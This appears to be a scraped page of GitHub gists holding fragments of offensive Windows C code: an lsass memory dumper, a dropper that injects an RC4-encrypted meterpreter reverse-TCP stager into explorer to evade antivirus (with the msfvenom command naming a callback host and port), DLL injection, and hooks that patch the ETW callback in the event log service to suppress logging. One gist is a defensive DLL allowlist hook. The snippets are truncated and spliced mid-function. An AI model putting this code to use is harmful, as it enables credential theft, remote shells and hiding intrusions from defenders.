bats3c / dumplsass.c
Last active August 6, 2020 01:55
Dump the memory from lsass
#include <stdio.h>
#include <windows.h>
#include <dbghelp.h>
#include <tlhelp32.h>
DWORD findLsass()
{
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hSnapshot)
{
bats3c / winapi_dropper.c
Created August 6, 2020 01:58
Inject a meterpreter stager into explorer while bypassing anti virus
#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>
#include <tlhelp32.h>
/****************************************************************************************************/
// msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.239 LPORT=4444 -f raw -o meter.bin
// cat meter.bin | openssl enc -rc4 -nosalt -k "HideMyShellzPlz?" > encmeter.bin
// xxd -i encmeter.bin
// x86_64-w64-mingw32-gcc dropper.c -o dropper.exe
#include <stdio.h>
#include <windows.h>
#define BUFFER_FILE ".\\wpm_buffer.bin"
// definitions
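// Function-pointer type with WriteProcessMemory's signature.  NOTE(review): presumably used to
// call through to the original implementation after the hook is installed — the caller that
// uses this type is outside this excerpt, confirm there.
typedef WINBOOL (WINAPI * WriteProcessMemory_) (HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);
// 50-byte save area.  Assumed (from the name) to hold the original bytes of WriteProcessMemory
// that the hook overwrites; the code that fills it is outside this excerpt — confirm the 50-byte
// size there.  Written as `{0}` rather than `{}`: the empty initializer is a GNU/C23 extension,
// whereas `{0}` is valid C99/C11 and yields the same all-zero contents.
char OrgWriteProcMem[50] = {0};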
VOID InjectDll(DWORD dwPid, LPCVOID lpDllPath)
{
LPVOID lpBuffer;
HANDLE hProcess, hThread;
hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, dwPid);
if (!hProcess)
{
return;
}
bats3c / ldrloaddll_hook.c
Last active March 14, 2024 06:49
Hook LdrLoadDll to whitelist DLLs being loaded into a process
#include <stdio.h>
#include <windows.h>
#include <winternl.h>
// Number of entries in cAllowDlls below; keep the two in sync when adding paths.
#define dwAllowDllCount 1
// Allowlist of DLL paths that the LdrLoadDll hook permits to load into the process.
// NOTE(review): the table is writable (not const) and holds plain CHAR paths; how the hook
// compares a requested module against it (case sensitivity, path normalisation, full path vs.
// base name) is decided in the hook body, which is outside this excerpt — confirm there, since
// that comparison is what makes the allowlist effective.
CHAR cAllowDlls[dwAllowDllCount][MAX_PATH] = {
"W:\\allowed.dll"
};
// Installs the LdrLoadDll hook.  lpAddr is presumably the address to hook (LdrLoadDll itself);
// the definition is further down the file, outside this excerpt — confirm the parameter's meaning there.
VOID HookLoadDll(LPVOID lpAddr);
#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>
#include <tlhelp32.h>
#include <ntdef.h>
#include <winternl.h>
#include "main.h"
/****************************************************************************************************/
bats3c / locate_wevtsvc_base_address.c
Last active September 4, 2020 14:32
Locate the base address of wevtsvc.dll
DWORD_PTR dwBase;
DWORD i, dwSizeNeeded;
HMODULE hModules[102400];
TCHAR szModule[MAX_PATH];
if (EnumProcessModules(GetCurrentProcess(), hModules, sizeof(hModules), &dwSizeNeeded))
{
for (int i = 0; i < (dwSizeNeeded / sizeof(HMODULE)); i++)
{
ZeroMemory((PVOID)szModule, MAX_PATH);
bats3c / pattern_search_etwcallback.c
Last active September 4, 2020 14:42
Pattern search for the ETW callback
#define PATTERN "\x48\x83\xec\x38\x4c\x8b\x0d"
DWORD i;
LPVOID lpCallbackOffset;
for (i = 0; i < 0xfffff; i++)
{
if (!memcmp((PVOID)(dwBase + i), (unsigned char*)PATTERN, strlen(PATTERN)))
{
lpCallbackOffset = (LPVOID)(dwBase + i);
bats3c / hook_etw_callback.c
Created September 4, 2020 15:12
Hook The ETW Callback
VOID HookEtwCallback()
{
DWORD oldProtect, oldOldProtect;
unsigned char boing[] = { 0x49, 0xbb, 0xde, 0xad, 0xc0, 0xde, 0xde, 0xad, 0xc0, 0xde, 0x41, 0xff, 0xe3 };
*(void **)(boing + 2) = &EtwCallbackHook;
VirtualProtect(lpCallbackOffset, 13, PAGE_EXECUTE_READWRITE, &oldProtect);
memcpy(lpCallbackOffset, boing, sizeof(boing));
bats3c / restore_callback.c
Created September 4, 2020 15:32
Restore the callback so we can report an event, then rehook it
// Function-pointer type with the signature of an ETW event-record callback.
// NOTE(review): presumably used to invoke the original callback once its bytes have been
// restored by DoOriginalEtwCallback below — the call itself is outside this excerpt, confirm there.
typedef VOID(WINAPI * EtwEventCallback_) (EVENT_RECORD *EventRecord);
VOID DoOriginalEtwCallback( EVENT_RECORD *EventRecord )
{
DWORD dwOldProtect;
VirtualProtect(lpCallbackOffset, sizeof(OriginalBytes), PAGE_EXECUTE_READWRITE, &dwOldProtect);
memcpy(lpCallbackOffset, OriginalBytes, sizeof(OriginalBytes));
VirtualProtect(lpCallbackOffset, sizeof(OriginalBytes), dwOldProtect, &dwOldProtect);